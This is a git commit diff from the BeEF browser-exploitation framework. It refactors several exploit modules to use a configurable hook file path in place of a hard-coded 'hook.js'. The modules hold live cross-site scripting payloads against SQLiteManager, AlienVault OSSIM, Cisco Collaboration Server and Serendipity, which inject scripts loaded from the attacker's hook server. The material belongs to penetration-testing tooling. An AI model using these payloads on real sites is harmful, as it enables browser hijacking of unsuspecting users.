Change hard-coded 'hook.js' to 'beef.http.hook_file'

2014-01-04 11:33:58 +10:30
parent 6d449672ae
commit f97087c37a
6 changed files with 15 additions and 6 deletions
--- a/extensions/customhook/html/index.html
+++ b/extensions/customhook/html/index.html
@@ -3,11 +3,15 @@
    Browser Exploitation Framework (BeEF) - http://beefproject.com
    See the file 'doc/COPYING' for copying permission
 -->
+<%
+  @configuration = BeEF::Core::Configuration.instance
+  hook_file = @configuration.get("beef.http.hook_file")
+%>
 <html>
 <head>
 	<title><%= @customhook_title %></title>
 	<script>
-		var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '/hook.js" type="text/javascript"><\/script>';
+		var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '<%= hook_file %>" type="text/javascript"><\/script>';
 		document.write(commandModuleStr);
 	</script>
 </head>
--- a/modules/exploits/sqlitemanager_xss/module.rb
+++ b/modules/exploits/sqlitemanager_xss/module.rb
@@ -9,7 +9,8 @@ class Sqlitemanager_xss < BeEF::Core::Command

 		configuration = BeEF::Core::Configuration.instance
 		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
-		hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+		hook_file = configuration.get("beef.http.hook_file")
+		hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}#{hook_file}"

 		return [
 			{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://127.0.0.1/sqlite/index.php?dbsel=1"><script src="'+hook_uri+'"></script><p+"'}
--- a/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb
+++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb
@@ -9,7 +9,8 @@ class Alienvault_ossim_3_1_xss < BeEF::Core::Command

 		configuration = BeEF::Core::Configuration.instance
 		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
-		hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+		hook_file = configuration.get("beef.http.hook_file")
+		hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}#{hook_file}"

 		return [
 			{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/ossim/top.php?option=3&soption=3&url=<script src='+hook_uri+'></script>'}
--- a/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
@@ -9,7 +9,8 @@ class Cisco_collaboration_server_5_xss < BeEF::Core::Command

 		configuration = BeEF::Core::Configuration.instance
 		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
-		hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+		hook_file = configuration.get("beef.http.hook_file")
+		hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}#{hook_file}"

 		return [
 			{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest="><script src="'+hook_uri+'"></script>'}
--- a/modules/exploits/xss/serendipity_1.6_xss/module.rb
+++ b/modules/exploits/xss/serendipity_1.6_xss/module.rb
@@ -9,7 +9,8 @@ class Serendipity_1_6_xss < BeEF::Core::Command

 		configuration = BeEF::Core::Configuration.instance
 		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
-		hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+		hook_file = configuration.get("beef.http.hook_file")
+		hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}#{hook_file}"

 		return [
 			{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]=\'"</script><script src="'+hook_uri+'"></script>'}
--- a/modules/phonegap/phonegap_persistence/module.rb
+++ b/modules/phonegap/phonegap_persistence/module.rb
@@ -14,12 +14,13 @@ class Phonegap_persistence < BeEF::Core::Command
    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    hook_file = @configuration.get("beef.http.hook_file")

    return [{
      'name' => 'hook_url',
      'description' => 'The URL of your BeEF hook',
      'ui_label'=>'Hook URL',
-      'value' => proto + '://'+beef_host+':'+beef_port+'/hook.js',
+      'value' => proto + '://'+beef_host+':'+beef_port+hook_file,
      'width' => '300px'
    }]
  end